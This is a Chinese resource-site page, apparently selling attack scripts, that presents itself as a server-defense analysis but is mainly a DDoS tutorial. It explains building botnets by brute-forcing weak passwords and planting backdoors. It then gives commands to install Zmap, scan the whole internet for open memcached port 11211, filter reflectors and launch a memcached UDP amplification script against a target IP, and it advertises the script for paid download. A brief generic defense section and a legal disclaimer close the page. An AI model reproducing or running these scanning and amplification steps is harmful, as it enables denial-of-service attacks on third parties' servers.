最新公告
  • 欢迎您光临黎明资源网,本站是国内最专业的棋牌游戏和网站建设资源下载平台,拥有最全面的游戏源码、整站源码立即加入我们
  • 服务器安全防御原理刨析,MEMC放大脚本扫描原理教程

    服务器安全防御原理刨析,MEMC放大脚本扫描原理教程 最后编辑:2021-06-05

    搬瓦工注册链接:精品稳定服务器购买

    发包机要求:G口宽带服务器  必须支持伪造

    麻烦把帖子内容一个个字都看过去

    阿斯累了这可能是最后一期教程

    没有哪里多精力了 又要工作了

    我先来说一下 什么是ddos

    ddos就是通过大量的发包把服务器宽带堵塞 来达到瘫痪服务器网络的目的

    这样子说你们可能不明白那我就换另外一种方法来说你们可能就会明白了

    举个例子一个公交车只可以承载50个人

    这个时候我却叫100个人去挤这辆公交车

    这个时候这辆公交车就无法正常运行了

    DDOS攻击的方式有两种

    第一种就是抓鸡集群来攻击

    什么是抓鸡 抓鸡就是扫描服务器或者家用电脑指定端口IP地址

    然后用弱密码字典来爆破这些IP服务器密码

    爆破成功后就可以登录别人的服务器或者家用电脑然后再留下后门木马

    这样子你就拥有别人服务器的控制权 然后你就可以操控别人的电脑进行发包攻击

    这种方法是最弱的但是不需要什么钱

    一般想要集群攻击需要几百只鸡才可以打死一个服务器

    另外一种方法就是发包

    发包需要一个脚本和一个可以支持伪造的G口或者10G口服务器

    什么?你说你不知道什么是G口服务器

    1024M等于1G现在明白什么是G口服务器了吧就是1024M宽带的服务器 我们称之为G口服务器

    什么?你不知道支持伪造是什么意思?

    比如我只有一个固定的IP地址 是111.111.111.111

    但是我发包的时候IP地址会进行随机变化

    比如111.111.123.123或者是111.111.000.111

    现在明白什么是伪造IP地址了吧?

    后我们需要有一个发包脚本和一个列表

    这样子我们就可以正常进行发包了

    阿斯用的10G口服务器一台差不多50G多少的量

     

    每家服务器的发包量都是不一样的

    需要你自己测试

    一般高防服务器100G左右的 阿斯两台就可以打死了 秒恢复的就一直压着打就行了

    然后我们再来说一下什么是cc攻击

    cc攻击就是模拟多个用户不停地对网页发送大量数据操作

    然后就会造成服务器的CPU达到爆满永远都有处理不完的连接请求 然后网络就会拥塞 网页就会无法正常打开

    cc攻击只需要一个脚本和一个代理IP

    另外特别说明cc不可能打出几十G的量 他的量只有100到200kb左右

    cc和ddos完全不是一个性质

    好了大概就是这些了

    我只把自己理解的说了一下 还有很多都没有说

    大佬就不要出来杠我了

    DDOS实战视频

     

     

     

    晚一点我会发扫表教程以及cc教程

    和cc脚本以及cc使用方法

    第一步升级所有包,改变软件设置和系统设置,系统版本内核都升级

    yum -y update

    第二步下载rpm包(区分centos6 与centos7 执行不同的命令)

    centos6:

    wget http://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm

    sudo rpm -Uvh epel-release-6-8.noarch.rpm

    centos7:

    wget http://mirror.centos.org/centos/7/extras/x86_64/Packages/epel-release-7-11.noarch.rpm

    sudo rpm -Uvh epel-release-7-11.noarch.rpm

    第三步安装必要的依赖环境

    yum install gcc libcap libpcap libpcap-devel screen php dstat cmake gmp gmp-devel gengetopt byacc flex git json-c

    第四步安装Zmap

    wget https://github.com/zmap/zmap/archive/v1.0.3.tar.gz

    tar -zxvf v1.0.3.tar.gz

    cd /root/zmap-1.0.3

    cd src/

    make

    make install

    第五步扫描全网11211端口

    screen -s memc zmap -p 11211 –probe-args=file:/root/memcache_11211.pkt -o memc1.txt

    第六步过滤列表

    php MemcacheStatusRespondChecker.php memc1.txt 1122.txt 10 10

    memc发包教程

    下面是memc udp放大攻击脚本

    需要linux系统运行

    指令如下

    ./memc ip memc.txt 1 -1 1800 1

    ./memc 是运行脚本的意思

    ip是你要攻击的ip地址

    memc.txt是列表

    1是线程

    -1是不限制攻击流量

    1800是1800秒

     

    脚本下载地址:限时?钻石?会员5折优惠,免费更新服务

     

     

     

     

     

    扫描文件已补

    帖子已重新编辑

    特别提示:新手小白慎拍!此服务只包含密钥授权和版本免费更新,不提供任何额外其他服务!

    五、总结

    DDOS攻击很难通过某一种手段做到完全防御,很多中小型企业,没有能力也没有财力来对抗DDOS攻击。但通过下面的几点,还是可以做到简单的防御:

    1. 保证服务器系统的安全
      首先要确保服务器软件没有任何漏洞,防止攻击者入侵。确保服务器采用最新系统,并打上安全补丁。在服务器上删除未使用的服务,关闭未使用的端口。对于服务器上运行的网站,确保其打了最新的补丁,没有安全漏洞。
      
    2. 隐藏服务器真实IP
      服务器前端加CDN中转(免费的有百度云加速、360网站卫士、加速乐、安全宝等),如果资金充裕的话,可以购买高防的盾机,用于隐藏服务器真实IP,域名解析使用CDN的IP,所有解析的子域名都使用CDN的IP地址。此外,服务器上部署的其他域名也不能使用真实IP解析,全部都使用CDN来解析。
      
      另外,防止服务器对外传送信息泄漏IP,最常见的是,服务器不使用发送邮件功能,如果非要发送邮件,可以通过第三方代理(例如sendcloud)发送,这样对外显示的IP是代理的IP。
      
      总之,只要服务器的真实IP不泄露,10G以下小流量DDOS的预防花不了多少钱,免费的CDN就可以应付得了。如果攻击流量超过20G,那么免费的CDN可能就顶不住了,需要购买一个高防的盾机来应付了,而服务器的真实IP同样需要隐藏。

    本文章只供交流学习,请遵纪守法,做一个热爱祖国的好公民!
    请不要擅自攻击别人系统,由此造成的一起后果由攻击者自行承担!

    搬瓦工注册链接:精品稳定服务器购买

    猜你在找

    全站默认解压密码:www.lmziyuan.com 转载请注明出处:黎明资源网
    黎明资源网 » 服务器安全防御原理刨析,MEMC放大脚本扫描原理教程

    常见问题FAQ

    免费下载或者VIP会员专享资源能否直接商用?
    本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
    提示下载完但解压或打开不了?
    注意资源默认解压密码:www.lmziyuan.com 最常见的情况是下载不完整: 可对比下载完压缩包的与网盘上的容量,若小于网盘提示的容量则是这个原因。这是浏览器下载的bug,建议用百度网盘软件或迅雷下载。若排除这种情况,可在对应资源底部留言,或 联络我们.。
    找不到素材资源介绍文章里的示例图片?
    对于PPT,KEY,Mockups,APP,网页模版等类型的素材,文章内用于介绍的图片通常并不包含在对应可供下载素材包内。这些相关商业图片需另外购买,且本站不负责(也没有办法)找到出处。 同样地一些字体文件也是这种情况,但部分素材会在素材包内有一份字体下载链接清单。
    新手须知!包含哪些服务?
    本站只提供资源下载分享,不提供带搭建,二次开发和修复BUG等其他服务。需要这些增值项目可咨询客服另购相应的服务!特别提示:某些资源可能需要有一定的网络基础知识,新手小白慎拍!由于资源的可复制性,下载了资源不提供任何理由退款,敬请谅解!恶意退款和不当共享会员账号将导致会员账号权限永久关闭!
    • 2021-04-21Hi,初次和大家见面了,请多关照!

    Hi, 如果你有疑问,可以跟我联系哦!

    联系作者
    • 11312会员总数(位)
    • 232资源总数(个)
    • 0本周发布(个)
    • 0 今日发布(个)
    • 1348稳定运行(天)

    提供最优质的源码资源集合

    立即查看 了解详情
    升级SVIP尊享更多特权立即升级